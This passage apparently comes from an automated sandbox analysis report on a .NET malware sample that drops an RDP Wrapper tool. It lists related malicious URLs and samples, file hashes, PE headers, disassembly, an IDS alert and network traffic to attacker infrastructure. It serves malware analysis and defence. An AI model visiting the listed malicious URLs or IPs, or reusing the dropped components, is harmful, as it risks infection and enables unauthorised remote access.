                                                                                        https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                                                                        • 185.64.191.210
                                                                                        Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                                        • 198.47.127.20
                                                                                        https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                        • 185.64.191.210
                                                                                        https://en.softonic.comGet hashmaliciousUnknownBrowse
                                                                                        • 198.47.127.18

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ePERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                        • 188.114.97.3
                                                                                        404.exeGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        E_BILL9926378035.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 188.114.97.3
                                                                                        D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Program Files\RDP Wrapper\rdpwrap.dllfile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                          smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Program Files\RDP Wrapper\rdpwrap.dll

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):116736
                                                                                                            Entropy (8bit):5.884975745255681
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                                            MD5:461ADE40B800AE80A40985594E1AC236
                                                                                                            SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                                            SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                                            SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 54%
                                                                                                            • Antivirus: Virustotal, Detection: 57%, Browse
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: smss.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                            C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:Generic INItialization configuration [SLPolicy]
                                                                                                            Category:dropped
                                                                                                            Size (bytes):443552
                                                                                                            Entropy (8bit):5.4496544667416975
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                                                            MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                                                            SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                                                            SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                                                            SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                                                            Malicious:false
                                                                                                            Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1298
                                                                                                            Entropy (8bit):5.345181606725495
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2c/sXE4qdKm:MxHKlYHKh3oPtHo6hAHKzeBHCHHA
                                                                                                            MD5:B602069B69E310409FAD82BFC3CBB818
                                                                                                            SHA1:ED23568805903474D8E77BCE3AD927E5065FFFCD
                                                                                                            SHA-256:979D1AD6AF4CFA4BF6782D5F781BE35F0C7B9FF42B09EE9D3165A3E8F3B80E57
                                                                                                            SHA-512:A5EFDA1DAA3616317054E5F692DF3A7ACA497DFA7BD3B42F056777F0CA3BAF422725C88C47FDC8718CA157CABB15BCCDC26EDAF8A31ECA491FC1C38A8342C43C
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di

                                                                                                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):1785344
                                                                                                            Entropy (8bit):6.646511331349125
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                                                            MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                            SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                                                            SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                                                            SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................

                                                                                                            C:\Windows\System32\rfxvmt.dll

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):37376
                                                                                                            Entropy (8bit):5.7181012847214445
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                            MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                            SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                            SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                            SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                                                                                            \Device\ConDrv

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):7
                                                                                                            Entropy (8bit):2.2359263506290326
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:t:t
                                                                                                            MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                            SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                            SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                            SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                            Malicious:false
                                                                                                            Preview:Ok.....

                                                                                                            \Device\Mup\571345*\MAILSLOT\NET\NETLOGON

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):3.650608324205336
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:PUlWRM5I2Y1Ank/tulLn:slWjGEtqLn
                                                                                                            MD5:3C791794E5AEF050D26FCAC2D8CFF99F
                                                                                                            SHA1:BF714C5132F15E04FE871C3A69496AFFDE2ED2D6
                                                                                                            SHA-256:44D608121797BDEF70283EBC36F2F15D2D05A5AA9BC7E3925965A1959FB8D078
                                                                                                            SHA-512:12B6C62176976D5FA2BD1684FCF06E64FF38D8D01F712042F1ECB0112A80B76CCD270A449E878BC7E946D7C29C1EE753E0404A842D0C52761B09D762DB0E1087
                                                                                                            Malicious:false
                                                                                                            Preview:....5.7.1.3.4.5.....\MAILSLOT\NET\GETDCFA437B49.................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.993016539246401
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:file.exe
                                                                                                            File size:946'176 bytes
                                                                                                            MD5:6ceb22aeb317c27cf8a0944ec9634d40
                                                                                                            SHA1:235d29feea468488b0f1faa70ac2ce1488ea79d7
                                                                                                            SHA256:d2184ec878d89c46f860fa4c37b4d3ebe4803287d894ae8eabf3e1d28ce322da
                                                                                                            SHA512:d6afd2c18743a0b1c818ac787417bbf0b033e336056462035f2372feb31e5060a933dca1e107559eb271f6b9ad5093a738c867c39f80ff15d46b4dd34e3346eb
                                                                                                            SSDEEP:24576:R5WX0rB7uivDX/CYzQ84GpxkFScTC818:7WcB1PHytJuu
                                                                                                            TLSH:4115231B22DC9412FF89ECF327956E045DB4A6E373264761B71C0E3CB795AD18833A68
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..V...........u... ........@.. ....................................`................................

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4e75de
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x880A0FF9 [Tue Apr 29 05:07:05 2042 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe75880x53.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe80000x1417.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xe55e40xe560091d178edf87e4f285d1f592e0d53f19dFalse0.991000723773842data7.995759768210477IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xe80000x14170x1600db1a5c6ea8d590647c63bf2ed92718b0False0.37340198863636365data5.28740838262783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xea0000xc0x20061197955e04234cb50a2da7263368b5aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_VERSION0xe80a00x254data0.45805369127516776
                                                                                                            RT_MANIFEST0xe82f40x1123XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4043765671301573

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-10-02T08:55:38.682625+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749709104.26.13.20580TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 2, 2024 08:54:58.410196066 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:58.415107965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:58.415179968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:58.417622089 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:58.422472000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037098885 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037205935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037216902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037308931 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.037537098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037606001 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037617922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037627935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037637949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.037662029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.037662029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.037725925 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.038366079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.038383007 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.038428068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.042196035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.042270899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.042279959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.042373896 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.088741064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.127243042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127295017 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127351046 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.127376080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127593994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127613068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127629042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.127784967 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.128192902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.128309011 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.128349066 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.128624916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.128642082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129013062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129029036 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129071951 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.129071951 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.129483938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129626989 CEST8049702147.45.44.104192.168.2.7
